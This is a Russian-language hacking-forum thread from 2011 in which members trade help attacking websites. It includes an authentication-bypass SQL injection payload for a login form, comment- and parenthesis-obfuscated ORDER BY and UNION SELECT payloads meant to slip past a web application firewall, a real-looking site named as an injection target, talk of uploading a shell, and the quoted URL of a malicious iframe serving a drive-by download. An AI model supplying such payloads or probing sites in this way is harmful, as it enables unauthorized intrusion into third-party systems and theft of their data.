ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.11.2011, 16:54
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Сообщение от Gorev
Gorev said:
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому
Отпиши пожалуйста как
|
|
|

13.11.2011, 17:42
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме: 1269624
Репутация:
114
|
|
Нашел Xss в input.
Фильтруется
[/CODE]
|
|
|

13.11.2011, 18:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от EST a1ien
EST a1ien said:
Нашел Xss в input.
Фильтруется
[/CODE]
|
|
|

14.11.2011, 13:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 204
Репутация:
0
|
|
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла
SQL Query:
SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')
логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет
SQL Query:
SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')
если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
|
|
|
|

14.11.2011, 15:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 229
Репутация:
0
|
|
Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae
я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
|
|
|
|

14.11.2011, 15:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 2918
Репутация:
0
|
|
Всем добрый день.
Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...
http://powerdefence.ru/Uslugi_dlya_Yur_lic'
|
|
|
|

14.11.2011, 18:19
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме: 102906
Репутация:
-14
|
|
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
|
|
|

14.11.2011, 20:37
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')
2 aydin-ka:
=-1'/**//*!order*//**//*!by*//**/10--+
Так пробовал? Все зависит от того, где именно происходит фильтрация.
|
|
|

14.11.2011, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от aydin-ka
aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Пробуй GROUP BY
или тупо
UNION SELECT 1 --
UNION SELECT 1,2 --
UNION SELECT 1,2,3 --
UNION SELECT 1,2,3,......,N --
Сообщение от Shimon
Shimon said:
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла
SQL Query:
SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')
логин
и
пасс
- то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля
admin' or 1=1 --
то на выходе и будет
SQL Query:
SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')
если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
В оба поля: ' or '1'='1
|
|
|
|

14.11.2011, 23:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
Сообщение от aydin-ka
aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Код:
Code:
(-1')order(by)10--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|